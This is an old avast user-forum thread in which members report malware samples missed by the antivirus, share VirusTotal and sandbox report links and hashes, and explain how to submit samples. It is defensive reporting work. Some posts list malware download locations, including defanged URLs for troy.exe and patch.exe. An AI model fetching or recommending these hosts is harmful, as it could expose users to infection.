http://www.virustotal.com/file-scan/report.html?id=d8b361811b4e12bc1e292b074f6cd6150d0f5e45b49ba0912043b8e2eec9a62e-1308928565
http://www.virustotal.com/file-scan/report.html?id=89ee3e6255ec44d1ef7ba3a746d49eecdf860c851c0ac8c0c7631f00fb614221-1308928781
-
Fake antivirus that are not detected by avast
<snip>
If you haven't already done so - Send the sample/s to avast as Undetected Malware:
Open the chest and right click in the Chest and select Add, navigate to where you have the sample and add it to the chest (see image). Once in the chest, right click on the file and select 'Submit to virus lab...' complete the form and submit, the file will be uploaded during the next update. Note: manually adding to the chest doesn't remove them from the original location, so they still have to be dealt with in that location.
Or
Send the sample to virus (at) avast (dot) com zipped and password protected with the password in email body.
-
Sample sent via Chest
http://www.virustotal.com/file-scan/report.html?id=776e3536e987359be4a2d5c7efb1f65e559778695864d1831d97ae74081d1f4c-1308940105
-
Hi Tech,
Is there a non-malicious variant of this here?
See: http://www.virustotal.com/url-scan/report.html?id=a755004c90acd2e1099ba75185c1a5fc-1308940633
and
http://www.virustotal.com/file-scan/report.html?id=bc9aeb88f809962165852b080f08a812d00880727f4877af8e8ffebc143d576a-1308947839
See: http://wepawet.iseclab.org/view.php?hash=a01a1b7802760698bb8bbf65a887917d&t=1308948344&type=js
polonus
-
Thanks Polonus. Just that browsing to learn about the software, I get the link for the malware :)
-
undetected malware
http://www.virustotal.com/file-scan/report.html?id=ae98df37be7d00d3dc3c79c7dd2688d8b2be463963795861f36e482dbd3e79c9-1308946250
Sent to Avast lab
-
submitted to AVAST for more than a week
26/ 42 (61.9%)
http://www.virustotal.com/file-scan/report.html?id=593d8db1d08e10421b66cf8cb74ded2c270d382b3bd7f054a89ef8e7b630543f-1309016384
14/ 42 (33.3%)
http://www.virustotal.com/file-scan/report.html?id=8daef7d62192465bfb791d37cc1f9324444a13e4654e015fd3dc239def5910bb-1309016894
-
Hi dirk0914,
This could be because the first mentioned malware is no longer online, see: http://anubis.iseclab.org/?action=result&task_id=1a04231d0da67a47471f1fea01df87605 which report was generated 2010-12-23 05:50:01
polonus
-
Detection missed by avast for MSIE ADODB.Stream Object File Installation Weakness attack,
VirTool:JS/Obfuscator.BN aka JS/Kryptik.AX
see VT scan results: http://www.virustotal.com/url-scan/report.html?id=aa04e02c6fa3b44f7a7dc063330d9ec7-1309030299
and
http://www.virustotal.com/file-scan/report.html?id=a42e2ac81838ff31355994d743e0a6510d9ae295634f208b83ec891def1b587b-1309037894
polonus
-
undetected malwares
http://www.virustotal.com/file-scan/report.html?id=bf63ba64f31b09c0656e46beb967e8481816231aa0c59b2d87d959b278942972-1309102892
http://www.virustotal.com/file-scan/report.html?id=2774ecc4438de853e0e38481cce23d19f0c6c7cd5e100ad8692e491e36ef2075-1309105498
http://www.virustotal.com/file-scan/report.html?id=4192374526b17ab2b821a0c150ea11386bbc04163b85b178ce83115a5b150236-1309107430
http://www.virustotal.com/file-scan/report.html?id=b9625af9bd04030c711749e0ad8f434cba5078c771e1b34142b9671dab7f04d2-1309108498
http://www.virustotal.com/file-scan/report.html?id=9f2864435b39e128e0a4b8a81308461d014fbecb67a380ea215c3418ecc3c70d-1309109784
Sent to Avast lab/team
-
How do you go about sending files to avast?
-
How do you go about sending files to avast?
You can send samples from the chest.
Or send them compressed to: virus(at)avast.com
-
How do you go about sending files to avast?
You can send samples from the chest.
Or send them compressed to: virus(at)avast.com
Gmail won't let me send you the file. How do I upload the files to the virus chest?
-
never mind figured it out myself.
http://www.virustotal.com/file-scan/report.html?id=9ed0034f82e0f7ad4f9598576c42c10c5e5da8ba73c3308b7705320e7f3e4c3c-1304343770
http://www.virustotal.com/file-scan/report.html?id=3c9a790d8f31eaf058f0b1fd2be3e972a1c2614472bfa86babfdc51b44728f6e-1309170404
-
Gmail won't let me send you the file.
Sorry, I forgot to mention that you should also password protect the file.
-
Sorry, I forgot to mention that you should also password protect the file.
If the user is making a .zip file, passworded or not, GMail will block.
You need to use .7z file (http://www.7-zip.org/).
-
If the user is making a .zip file, passworded or not, GMail will block.
You need to use .7z file (http://www.7-zip.org/).
Really..??
Well, I never used GMail...
-
undetected malware(s)
1: http://www.virustotal.com/file-scan/report.html?id=10a601f7f5b8e44dfd6633a94db6c6e12b75146b69c53bb35d50e5aa85f33265-1309184204
2: http://www.virustotal.com/file-scan/report.html?id=adff768f7edc9ef282eb192192eddc23adf9514b70fd819089e28f286419f1fb-1309186297
Sent to Avast lab/team
-
If the user is making a .zip file, passworded or not, GMail will block.
You need to use .7z file (http://www.7-zip.org/).
Really..??
Well, I never used GMail...
True ;) Use Hotmail instead. (If you have it)
-
undetected malware
1: http://www.virustotal.com/file-scan/report.html?id=9028e78d09567870788282a8ba7b58f85cc6b0151ef42194cf4880af9a297d84-1309199548
Sent to Avast lab/team
-
Hi folks,
Reported to avast previously: http://www.urlvoid.com/scan/i.cr3ation.co.uk
, but still no detection for the malware there: http://www.virustotal.com/file-scan/report.html?id=58fff56d2bc9ac02bf5c0a0d8ce8df9a7b9e47ced7fee3c2d79a952096afe8b4-1308867951
Anubis report here: http://anubis.iseclab.org/?action=result&task_id=136e7e4785ba99324b10d803b55bcf29b
http://www.threatexpert.com/report.aspx?md5=383b7a245c4f23699c652a050025a3b9
See: http://forum.avast.com/index.php?topic=78701.0
polonus
-
If the user is making a .zip file, passworded or not, GMail will block.
You need to use .7z file (http://www.7-zip.org/).
Really..??
Well, I never used GMail...
It does not matter because I figured out how to load it into the virus chest and submit the files to you guys
-
undetected malware
1: http://www.virustotal.com/file-scan/report.html?id=cd6771c37d8473837edd546dd92a57e84976c91973ee5a02ac2788024b167190-1309378612
Sent to Avast lab/team
-
Malware here or not? So report has been sent to virus at avast dot com
VT results: http://www.virustotal.com/url-scan/report.html?id=c53b9f81a4ea232afa473180c8943a07-1309371901 (4 gave malware site)
Nothing found here here: http://www.virustotal.com/file-scan/report.html?id=97c6bf9b71d07503d784366498bed19dda9a37b1fe332e1cfbba2e4e6a7f3959-1309379521
and at sucuri: site scan gave an all green
Now see this analysis: http://wepawet.cs.ucsb.edu/view.php?hash=c53b9f81a4ea232afa473180c8943a07&t=1309380172&type=js
Particularly see this scan analysis: http://anubis.iseclab.org/?action=result&task_id=1137cec51f97233b49dd9eb35b34f26c9
I.m.h.o. this code has a backdoor trojan mutex! see: DDrawDriverObjectListMutex
polonus
-
Malware here or not?
Report: 2011-06-30 09:41:41 (GMT 1)
Website: twistermp3.com
Domain Hash: b20cdc9f7cc85ad25ffbd0540bbe8c38
IP Address: 50.22.41.94
IP Hostname: 50.22.41.94-static.reverse.softlayer.com
IP Country: -- (--)
AS Number: 36351
AS Name: SOFTLAYER - SoftLayer Technologies Inc.
Detections: 5 / 23 (22 %)
Status: DANGEROUS
http://hosts-file.net/?s=twistermp3.com
http://www.mywot.com/en/scorecard/twistermp3.com
http://www.malwareblacklist.com/searchClearingHouse.php?search=twistermp3.com
http://global.sitesafety.trendmicro.com/
http://www.websecurityguard.com/results.aspx?qkw=twistermp3.com
-
If the user is making a .zip file, passworded or not, GMail will block.
You need to use .7z file (http://www.7-zip.org/).
Really..??
Well, I never used GMail...
7Z or RAR or every other compress format which encrypt file names ;)
-
Undetected malwares:
http://www.virustotal.com/file-scan/report.html?id=a83d7a0c90f0066840470cc82e5fe14e3626f90b49b42db83a0cec7cf72b2404-1313171873
http://www.virustotal.com/file-scan/report.html?id=919ee7a324f3631c4f104eb8b18a9587cd65a5ea6c5c3fa18a75311920ed58f8-1313173302
-
Another recent variant of this Gen:Variant.Renos.96 executable: http://www.virustotal.com/url-scan/report.html?id=455545b7d6ba1ace8273b20f6be550be-1313167837
Accompanying Anubis report: http://anubis.iseclab.org/?action=result&task_id=14cdffe97d5c00d34898e75d30b1b1048&format=html
See: http://camas.comodo.com/cgi-bin/submit?file=6e24ea2a39c54b350cc145700f154a9c6201b2d4cc02ebc43b5a3b9b5413a45f
reported to virus AT avast dot com
polonus
-
Trojan dropper not detected by avast:
http://www.virustotal.com/file-scan/report.html?id=5a7746eead66026c0cbea028cdfed76bbcd3d55125d25e5acc73303b67bfbc94-1313243176
See: http://www.threatexpert.com/report.aspx?md5=0be55123c40a8f4af0a355528551e306
and http://anubis.iseclab.org/?action=result&task_id=14e572957375b5c543db75b6e76ec98dd&format=html
reported to virus AT avast dot com
polonus
-
Hi forum friends,
This PSW.Generic9.HIA aka Trojan.PWS.SpySweep.52 not detected by avast: http://www.virustotal.com/file-scan/report.html?id=60ddaeb87503bb25977b96bfb44c5a619f200f72db665308f8dbca8acb38e0f2-1313330535
reported to virus AT avast dot com for added detection,
polonus
-
http://www.virustotal.com/url-scan/report.html?id=94986b54cc7a3a6e3abbd5f0b63a9bea-1313356410
Sorry if I'm wrong about it, I'm new to Virustotal.
-
http://www.virustotal.com/url-scan/report.html?id=94986b54cc7a3a6e3abbd5f0b63a9bea-1313356410
Sorry if I'm wrong about it, I'm new to Virustotal.
This surely has nothing to do with missed samples, e.g. files not detected, and your VT results relate to a site check rather than a file?
-
This surely has nothing to do with missed samples, e.g. files not detected, and your VT results relate to a site check rather than a file?
yea......but infected website is not detected
VirusTotal - html scan
http://www.virustotal.com/file-scan/report.html?id=009bdd5924e151b71cbaf5d3d37bc9bd7e6c3d0ccb0ccf300fd737be81b601a6-1313364210
-
Which again isn't a sample and not one which you can submit. Surely the whole purpose of this topic was/is to post the link and send the sample to avast for analysis.
Personally I still feel this topic a waste of time as there is zero follow up by the poster when the sample is detected. So you might as well cut out the topic middle man and just send it to avast.
Well, going directly to the remote source (superpuperdomain.com/count.php) rather than the suspect origin site it becomes less and less clear cut, and would need to be reported to avast for further analysis. The script tag after the closing html tag is possibly where the suspicion is, but Sucuri isn't too detailed on exactly what it finds.
See image of complete follow through from the script tag after the closing html tag (on all pages), to the final javascript file in the chain in adsshownow.com.
http://www.virustotal.com/file-scan/report.html?id=ff99d5233e40b1ba7e897172dacf3eae8fd436e3b65e251976ef5a7997f477d3-1313408365
http://www.virustotal.com/file-scan/report.html?id=e0f41a7a5fca244e5d2f3c98a94a39d665f21cca86c89c90662d4f89deaffbaa-1313409355
http://www.virustotal.com/file-scan/report.html?id=c15dd1360da706e839a14a224d4484b43bce90aaa1a7b01ba1aa9df87f16e39d-1313174208
-
Facebook trojan missed
See: http://www.virustotal.com/url-scan/report.html?id=cb239244dc34713ace6ef1b04f61525c-1313837626
and: http://www.virustotal.com/file-scan/report.html?id=f13d7e4d0581c3797a6d3e4a32ee15b4889132b4b854f050d51efb0f075b73b2-1313845400
reported to virus AT avast dot com
polonus
-
Thanks for helping improve detection Polonus.
-
And this one, trojan not detected, see: http://www.virustotal.com/url-scan/report.html?id=0dd880b4802f5fdecd01bb5d82489473-1313863942
and
http://www.virustotal.com/file-scan/report.html?id=90d7cfe213e3b284572ffe97a258fd33524fc212f007f8bdf565d1a6a30ae6f0-1313871146
not found here: http://wepawet.iseclab.org/view.php?hash=0dd880b4802f5fdecd01bb5d82489473&t=1313871598&type=js
suspicious here: http://wepawet.iseclab.org/view.php?hash=19b0fe1cc91d2779f4762c8aec2eb34c&t=1313872016&type=js (avast detects as Win32:Malware-gen)
reported to virus AT avast dot com
polonus
-
See: http://www.virustotal.com/url-scan/report.html?id=953cadfb513f918a346d33515e928f5b-1314034094
and http://www.virustotal.com/file-scan/report.html?id=0259afbf7d09dc04b605cb379fa9f1d41801dcaecf722129b4c381aa7ba8b6f9-1314041844
Not detected by avast yet, also see: http://anubis.iseclab.org/?action=result&task_id=1e7ea79dfb6ffbee4b14069f6af09e177&call=first
reported to virus AT avast dot com
polonus
-
http://www.virustotal.com/file-scan/report.html?id=4a44b4445a4913ccff3df0a13f1fa7aec1e353970af38d2e833d78db121fc3cf-1315640051
-
hmmmmmm........Only the lonely :-\ did you upload the sample Burkoff?......if not I have ;)
or is everyone wrong and avast! correct?
sigcheck:
publisher....: Hades.net.cn
copyright....: Hades
product......: NBA 2K9 Mini Editor
description..: NBA 2K9 Mini Editor
original name: n/a
internal name: n/a
file version.: 1.0.0.0
comments.....: n/a
signers......: -
signing date.: -
verified.....: Unsigned
Well ThreatExpert says:
Contains characteristics of an identified security risk. - Severity Level High
http://www.threatexpert.com/report.aspx?md5=d3d5f0c4d959cb24a9b9194213a7a146
-
Hi Pondus,
Or possibly it could not be executed: According to the Unix file command your file is of the following type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit.......
See: http://wepawet.iseclab.org/view.php?hash=381aae8fcce7f9f82278615c4d054d36&t=1315687363&type=js
& http://www.prevx.com/filenames/X461520440149902130-X1/NBA2K9.EXE.html
& http://siteinspector.comodo.com/public/reports/329355
Finally got anubis analysis via direct url scan:
http://anubis.iseclab.org/?action=result&task_id=144bac9e65818aaf415500f4821117490&format=html
polonus
-
Malwarebytes detects it as Virus.Alman
so I guess the detection is good......MBAM FP is rare
-
Hi Pondus,
Forwarded all info to virus at avast dot com, my friend. There still could be a remote possibility the protective Unix packer is being flagged by the rest of the "av pack", but I tend towards a non-detect more than to an FP.
Good we all helped out again and our initial thanks go out to Burkoff naturally for reporting this. Well, you could see, this non-detect blew his emoticon right out of proportion ;D
polonus
-
See: http://www.virustotal.com/url-scan/report.html?id=5a9486f19c2f21434130ef542ff57332-1316003623
See: http://r.virscan.org/4b95ea748e3582f7adf6b3d2bfc8a903
Avast does not detect this Fake AV? Spyware Preventer
http://wepawet.iseclab.org/view.php?hash=5a9486f19c2f21434130ef542ff57332&t=1316011037&type=js
See: https://safeweb.norton.com/report/show?name=junye.us
Here it is not being flagged: http://www.garyshood.com/virus/results.php?r=e74784f6379cbbf107b64fc99c4c7eb6
But found a high risk page here: http://siteinspector.comodo.com/public/reports/345610
reported to virus at avast dot com
polonus
-
See: http://www.virustotal.com/url-scan/report.html?id=87589ce08721ebaf557afcc4767018d7-1316094314
Missed variant of a variant of Win32/Kryptik.SVN
see: http://www.virustotal.com/file-scan/report.html?id=63f11e6373b489e0a44abd84d03c98a8307c5a09d2d14fa3ac1a0bede3e19588-1316101979
Also see Wepawet Scan: http://wepawet.iseclab.org/view.php?hash=87589ce08721ebaf557afcc4767018d7&t=1316102196&type=js (verdict suspicious)
and accompanying Anubis report: http://anubis.iseclab.org/?action=result&task_id=1695760ed51c6881445779f1ebb3a872f
Now added to avast detection,
polonus
-
Hi, polonus
NBA2K9.exe not added! ??? ::)
China URL block.
-
Hi Burkoff,
Do you have an MD5 hash of this variant? Normally it is seen as safe: http://www.prevx.com/filenames/X461520440149902130-X1/NBA2K9.EXE.html
Well, if you mean MD5 d3d5f0c4d959cb24a9b9194213a7a146, it is classified as malware;
avast does not have detection for it yet: http://www.virustotal.com/file-scan/report.html?id=4a44b4445a4913ccff3df0a13f1fa7aec1e353970af38d2e833d78db121fc3cf-1315640051
polonus
P.S. If you have a block there, you could always go via the google cache file to get to the results,
D
-
undetected malware
http://www.virustotal.com/file-scan/report.html?id=65a312b1fa70fa9d2d5a0049f7283f40cb5232855b2408504b4c88a06e50b3d3-1316732404
-
Not detected:
http://www.virustotal.com/url-scan/report.html?id=47575a05cc9aaa764fe5aa8204914a82-1316787750
&
http://www.virustotal.com/file-scan/report.html?id=9fc5b93e2dcd221f55b9c852b0dda00ebac5df170bca0c7f2db03d0b46e18de3-1316794954
see: http://siteinspector.comodo.com/public/reports/366456
analysis: http://anubis.iseclab.org/?action=result&task_id=1cd8971cb9a4e4cc42d62c7c50b94135f
polonus
P.S. Consider checking against: http://www.backgroundtask.eu/Systeemtaken/taakinfo/22396/spotify.exe/
-
http://www.virustotal.com/file-scan/report.html?id=a27944ab233975b0d36c8306dceeebeb1ceda67fd1bf50691ebcf61cc1f9445b-1316799765
ZEROACCESS ROOTKIT!
-
If you haven't already done so send the sample/s to avast as Undetected Malware:
Open the chest and right click in the Chest and select Add, navigate to where you have the sample and add it to the chest (see image). Once in the chest, right click on the file and select 'Submit to virus lab...' complete the form and submit, the file will be uploaded during the next update. Note: manually adding to the chest doesn't remove them from the original location, so they still have to be dealt with in that location.
Or
Send the sample to virus (at) avast (dot) com zipped and password protected with the password in email body, a link to this topic might help and false positive/undetected malware in the subject.
-
As DavidR says in his reply the malware should be reported to virus AT avast dot com before posting the VT (non)-detection link here, so a sample should be sent for avast analysis first.
If an MD5 hash exists, other reports could be helpful, as in this case these scan results came up: reported 3defcb296fef1ac8a2c78ba83ff6bb07 = http://camas.comodo.com/cgi-bin/submit?file=a27944ab233975b0d36c8306dceeebeb1ceda67fd1bf50691ebcf61cc1f9445b&iframe=
Malware reported:
Thu, 22 Sep 2011 18:29:55 +0200 MD5: 3defcb296fef1ac8a2c78ba83ff6bb07
SHA1: fa98a481e32bf1c0d10b30e01ba8d64f78241341 0/43 (0%)
2011-09-22 16:10:54 (UTC) DrWeb detects as Trojan.DownLoader4.61543
Also take care to follow up and check the VT link afterwards for avast added detection. If not, it could mean the malware is no longer available, i.e. up and alive (happens a lot, because malcreants are ready to comply with complaints when filed or malware is found up and then they migrate their malcreations out somewhere else, even hopping bulletproof servers on all continents and high seas) or the malware should be reported again or is found not to be genuine malware. This is another reason to get hold of a sample and send that to virus AT avast dot com....
polonus
-
Hi Flash999,
Avast now has detection: http://www.virustotal.com/file-scan/report.html?id=a27944ab233975b0d36c8306dceeebeb1ceda67fd1bf50691ebcf61cc1f9445b-1316842762
@JuninhoSlo
http://www.virustotal.com/file-scan/report.html?id=65a312b1fa70fa9d2d5a0049f7283f40cb5232855b2408504b4c88a06e50b3d3-1316872770
So you see the results of your contribution here.
Well, thanks for helping towards avast detection here,
polonus
P.S. And detection for a non-detect I reported. Thank you, avast:
http://www.virustotal.com/file-scan/report.html?id=f13d7e4d0581c3797a6d3e4a32ee15b4889132b4b854f050d51efb0f075b73b2-1315480743
D
-
Malware not detected: http://www.virustotal.com/url-scan/report.html?id=67d13f4f1935b57232f9e608ccb1b797-1316946995
Found safe here: http://urlquery.net/report.php?id=3531
Bundle.php; these bundles can open both their own malware code as well as the desired real application whilst conserving the look and feel of the real data....classtype: trojan-activity,
polonus
-
Not detected by avast:
http://www.virustotal.com/url-scan/report.html?id=1824e7b0824027d9c2216e5931e6a15e-1317120057
and
http://www.virustotal.com/file-scan/report.html?id=f3c44f46ce20e60cf5fd5a30333ed748ef831ddcf675758428a9655c2eb1493d-1317127265
See: http://www.threatexpert.com/report.aspx?md5=a388dc7bc083bd22d3dec5520a29fc6d
infected with Trojan.AVKill.2
see: http://anubis.iseclab.org/?action=result&task_id=14d685be4054f05544db5f8a9e7792661
Nice with this Anubis analysis is that you can search here for entities,
for instance because of this entry found in Reg Values read:
HKLM\SOFTWARE\CLASSES\MIME\DATABASE\CONTENT TYPE\IMAGE/X-WMF Image Filter CLSID {607fd4e8-0a03-11d1-ab1d-00c04fc9b304}
then we find:
http://www.internetsecurityzone.com/Entities/?_{607fd4e8-0a03-11d1-ab1d-00c04fc9b304}
CLSID leads to "NPROC SERVER: %SYSTEM%\mshtml.dll",
pol
-
Not detected by avast or FP where flagged: http://www.virustotal.com/file-scan/report.html?id=3811522f704444686fe58c885344ed195286fc09c377b38c69976380e5b6a6f6-1317136844
&
http://www.urlvoid.com/scan/management-training-development.com
Heuristic find, see http://www.garyshood.com/virus/results.php?r=4460691f639bc71530c55a828774e6e1
polonus
-
Detection for TR/PSW.Zbot.Y.2324 missed by avast:
http://www.virustotal.com/url-scan/report.html?id=a95e38d958044850175682c7c0023386-1317290733
and
http://www.virustotal.com/file-scan/report.html?id=02d5366226ad3e3ffd4ebba68041d3e6974d572cc23b4186ceb0d1112f3af33f-1317298629
polonus
-
Undetected malware
1: http://www.virustotal.com/file-scan/report.html?id=dbb301c77256fe5f006916f502408d6dfcdead60030885e26d0f27a265497809-1317567623
2: http://www.virustotal.com/file-scan/report.html?id=b4b102e6771c0f1c1d32b4d44b1a7aee57fa4db4c1fb86b0ed4b408e606b1fb4-1317568668
3: http://www.virustotal.com/file-scan/report.html?id=eb2ea828e0bd71a2ca83ec380cfadfe014ed24f0d511634580af72f048daf300-1317569198
-
Undetected malware
1: http://www.virustotal.com/file-scan/report.html?id=dbb301c77256fe5f006916f502408d6dfcdead60030885e26d0f27a265497809-1317567623
2: http://www.virustotal.com/file-scan/report.html?id=b4b102e6771c0f1c1d32b4d44b1a7aee57fa4db4c1fb86b0ed4b408e606b1fb4-1317568668
3: http://www.virustotal.com/file-scan/report.html?id=eb2ea828e0bd71a2ca83ec380cfadfe014ed24f0d511634580af72f048daf300-1317569198
1: I think it is false positive
2: OK
3: ??? looks like infection
-
1: I think it is false positive
maybe.....but sure looks suspicious
First seen: 2011-10-02 14:26:45
Last seen : 2011-10-03 12:22:53
sigcheck:
publisher....: n/a
copyright....: n/a
product......: n/a
description..: n/a
original name: n/a
internal name: n/a
file version.: n/a
comments.....: n/a
signers......: -
signing date.: -
verified.....: Unsigned
-
undetected malware
http://www.virustotal.com/file-scan/report.html?id=238a885c0721551c23b9bd3f8a17f5db5cf1fde6a6ccf4c50336be36c3899c81-1317767024
-
http://www.virustotal.com/file-scan/report.html?id=b5bb33c3d08e98d3ab4c01fbc86894d5de4e40dcdbde49c7111193fd37326a46-1316718030
Trojan?
-
Posting VT results here will not help unless you also upload the samples to avast.....did you?
-
sorry guys :'(
if I am doing things wrong....I don't know much, just want to help!
I am just a compulsive tinkerer who has been watching this forum for the past week...I am an avast! user no doubt...I just love avast! 8)
-
I will try and get some samples from Malc0de...
-
I will try and get some samples from Malc0de...
First, thanks for trying to help..! :)
But be very careful, if you are not sure how to do this, it's better to stay away. ;)
-
Not found Trojan-PSW.Win32.Kykymber.ajbc - see: http://www.nictasoft.com/angel/md5/07694F50E98C1D8406E70A8002D9F7B0
see: http://www.virustotal.com/file-scan/report.html?id=67054abbff844da60f546064d484f09aacf658cc9a78b13b1e6b7bc70301476e-1319134424
Nothing here: http://wepawet.iseclab.org/view.php?hash=0008c26da3a22394da5967cae423368b&t=1319366553&type=js
and nothing here:
http://vscan.urlvoid.com/analysis/2a15fe4e164249efc7e130e5f635913e/cGFjaw==/
polonus
-
Not found Trojan-PSW.Win32.Kykymber.ajbc - see: http://www.nictasoft.com/angel/md5/07694F50E98C1D8406E70A8002D9F7B0
see: http://www.virustotal.com/file-scan/report.html?id=67054abbff844da60f546064d484f09aacf658cc9a78b13b1e6b7bc70301476e-1319134424
Nothing here: http://wepawet.iseclab.org/view.php?hash=0008c26da3a22394da5967cae423368b&t=1319366553&type=js
and nothing here:
http://vscan.urlvoid.com/analysis/2a15fe4e164249efc7e130e5f635913e/cGFjaw==/
polonus
hХХp://zerbilisim.com/patch//pack/
hХХp://zerbilisim.com/patch//pack/troy.exe
hХХp://zerbilisim.com/patch//patch.exe
http://online.us.drweb.com/cache/?i=50ef4246150d7b2342a55b9436595310
http://www.virustotal.com/file-scan/report.html?id=6680d01f92c1426ca3aa5d4930c452cfc7bb079425431c140f76eb2cee581184-1319367455
http://virusscan.jotti.org/ru/scanresult/f90c010e12a9c0b9366e79d57d8b0a96856f69df
-
Hi Dim@rik,
Certainly a malware site: http://www.virustotal.com/url-scan/report.html?id=eff2622252021746e44c3e64802486a6-1319381223
Thanks for your further evaluation.
But avast does not detect: http://www.virustotal.com/file-scan/report.html?id=92200560416ccbd1f9f4ac23a9ab3df4ce31fbb6587ca410ba49a159869ee428-1319154103
But I hit at these results: http://www.virustotal.com/file-scan/report.html?id=67054abbff844da60f546064d484f09aacf658cc9a78b13b1e6b7bc70301476e-1319134424
Not found by DrWeb as it does not unpack the ASPACK packer: http://online.us.drweb.com/result/?lng=en&chromeplugin=1&url=http%3A%2F%2Fzerbilisim.com%2Fpatch%2F%2Fpack%2F
else it does find it as you have shown: http://online.us.drweb.com/result/?lng=en&chromeplugin=1&url=http%3A%2F%2Fzerbilisim.com%2Fpatch%2F%2Fpack%2Ftroy.exe
also: http://vscan.urlvoid.com/file/07694f50e98c1d8406e70a8002d9f7b0/dHJveS1leGU=/
http://urlquery.net/queued.php?id=5867
= virusname: Trojan-PSW.Win32.Kykymber.ajbc found at ip: 46.45.136.234
from Istanbul - previous at -http://privategoldtrader.com/templates/beez/
and before that at =http://privategoldtrader.com/templates
MD5 hashes resp.: md5: 0209aa4baab3df392e487bb7d5f538a6 (the one I reported)
md5: 0209aa4baab3df392e487bb7d5f538a & md5: 3dd46205274955be03c2e8e4674011ea
Normally avast should have a good score for this malware with 34.02%
polonus
-
Hi Dim@rik,
Not found by DrWeb as it does not unpack the ASPACK packer: http://online.us.drweb.com/result/?lng=en&chromeplugin=1&url=http%3A%2F%2Fzerbilisim.com%2Fpatch%2F%2Fpack%2F
else it does find it as you have shown: http://online.us.drweb.com/result/?lng=en&chromeplugin=1&url=http%3A%2F%2Fzerbilisim.com%2Fpatch%2F%2Fpack%2Ftroy.exe
polonus
That's right ... this is the directory path where the viruses are.
hХХp://zerbilisim.com/patch//pack/troy.exe
hХХp://zerbilisim.com/patch//patch.exe
Send to Avast.
-
Hi Dim@rik,
Site Inspector's cloud detection has it also: http://siteinspector.comodo.com/public/reports/463988
& while this one is missed by it: http://siteinspector.comodo.com/public/reports/464884
I reported there,
polonus
-
undetected malware
1: http://www.virustotal.com/file-scan/report.html?id=2b601b9b309a1c173f34fb9dcbcd9391a1b1c692a615c1e02747d8adb27b1b09-1319476939
2: http://www.virustotal.com/file-scan/report.html?id=8a68cff52f13b825062bb53f27428f4fe85bdfbbd07550487b0777bb0af972ad-1319286992
3: http://www.virustotal.com/file-scan/report.html?id=bd31db0b57939d330032579515b1b70b9717819ef8fecff566df0597b199d982-1319480831
-
JuninhoSlo, did you send the samples to avast? Otherwise they cannot improve detection of those ones.
-
JuninhoSlo, did you send the samples to avast? Otherwise they cannot improve detection of those ones.
Of course ;)
Via:
- Email
- Chest
- http://www.avast.com/en-eu/contacts
-
Sorry to have asked. Thanks for improving detection.
-
Sorry to have asked. Thanks for improving detection.
It's OK ;) Thank you :D
-
Hi JuninhoSlo,
There are more versions of that possible malware, see: http://f.virscan.org/Freesimser.exe.html
Did you follow up all of the various MD5 hashes to see if avast has detection for this
PE32 executable for MS Windows (GUI) Intel 80386 32-bit? Some were given as VT goodware detections?
87ed1485cd9b0d2ca0c4ff033a16d37f
see: http://reports.antivirus-lab.com/10300/malwarewin32-generic-96/
459c5b2c63ec309789e3a7d0a0c170e0
c1406b68d70a59f059fec3d2d21adbb4
ecb1e6433d78850ade10ad8746f053a8
see: http://www.threatexpert.com/report.aspx?md5=ecb1e6433d78850ade10ad8746f053a8
d0375ea1f89f2a60dd4b8c0bd0783af7
http://r.virscan.org/8827b020c49ac0821e458a55d5d8a8b5
http://www.virustotal.com/file-scan/report.html?id=2742e12f906ec5c13bb57cf3feac314bd6deed6deda9a3200eb2df0e38c35851-1306013342
McAfee 5400.1158 6282 2011-03-11 PWS-SpyEye!env.a
polonus
-
Not detected by avast ZeuS Binary: http://vscan.urlvoid.com/analysis/542e9f10caffc69c2ed97db102b6e04a/Ym4tZXhl/
Analysis: http://anubis.iseclab.org/?action=result&task_id=13dc0cdf93d100f742d1557612e5b682a&format=html
reported to virus AT avast dot com
polonus
-
Another Trojan-Spy.Win32.Zbot.biwp detection missed...
Why not detected here: http://www.virustotal.com/url-scan/report.html?id=45666eb9e46b4d1c7f68a0786630a878-1319886530
http://www.virustotal.com/file-scan/report.html?id=8f3ff2e2482468f3b9315a433b383f0cc0f9eb525889a34d4703b7681330a3fb-1319894039
See: http://urlquery.net/queued.php?id=6539 = 0/39 (0.0%) Trojan-Spy.Win32.Zbot.biwp http://www.threatexpert.com/report.aspx?md5=c33a3b5f4fb8bd991aae89fc83362cc7 and see:
https://zeustracker.abuse.ch/monitor.php?host=moneyindahouse.com
likewise on that IP 60.19.30.135 we have/had: http://malc0de.com/database/index.php?search=60.19.30.135&IP=on
Reported to virus AT avast dot com,
polonus
-
Avast misses PHP/IRCBOT.E.29297, see: http://www.virustotal.com/url-scan/report.html?id=690874991353a45b81c54a9898c268f3-1320075080
and http://www.virustotal.com/file-scan/report.html?id=72647d00b6a72a09b90420324bc6fa874d093692bab91200cea982df85c24cde-1320078981
/fighter script - Rema [baby]-IRC-[BOT] Decoded Files
494e/d639826fadb0d1dd6457be70593d9e090a15 from -myheart82 dot waphall dot com/war.txt
Also see: http://urlquery.net/queued.php?id=6653
reported to virus AT avast dot com
polonus
-
Generic25.BCJW missed by avast: http://www.virustotal.com/file-scan/report.html?id=cb6e91036a082b049bcb914fe031ac41210758ffb38aca8bda36c639c6349b59-1320164120
See: http://anubis.iseclab.org/?action=result&task_id=1d58b9a09bdda1e349d5dc550556ad882
see: http://urlquery.net/queued.php?id=6908
compare: http://www.threatexpert.com/report.aspx?md5=19a418e0400d554dda9b54520bdf52b4
polonus
Now detected by avast as Win32:Malware-gen
D
-
http://www.virustotal.com/file-scan/report.html?id=2522c0ef1cb72c42e1250975ad511e165d4054a4fabf95f88b38cdb3e55e3966-1320252829
Keylogger. Sent it through the chest 3 days ago, still undetected.
-
Detection missed: http://www.virustotal.com/url-scan/report.html?id=9d56c843261e819a7c745fcb6ab1d987-1320267352
and
http://www.virustotal.com/file-scan/report.html?id=0a88dd2f44b1c44f6d0e1470c7e1d018254f0d939f8b25fe10e08a73d7bdca6e-1320270960
See: http://anubis.iseclab.org/?action=result&task_id=11c954aee33e985e4c54f34891d9dee41
polonus
-
See: http://www.virustotal.com/url-scan/report.html?id=e1b3354a989a393c9b59a70f91683e4d-1320323964
File analysis: http://www.virustotal.com/file-scan/report.html?id=b33d05f518f91280b692f0ac9db98042280af301d40ae9226360ec38ff2860a5-1320327855
See: http://urlquery.net/queued.php?id=7141
Checking with DrWeb's online url checker: -http://sydneymoon.com/legal.html
Engine version: 5.0.2.3300
Total virus-finding records: 2734855
File size: 3928 bytes
File MD5: 66a4e5fddbce8e70968e49e5a1ffc84f
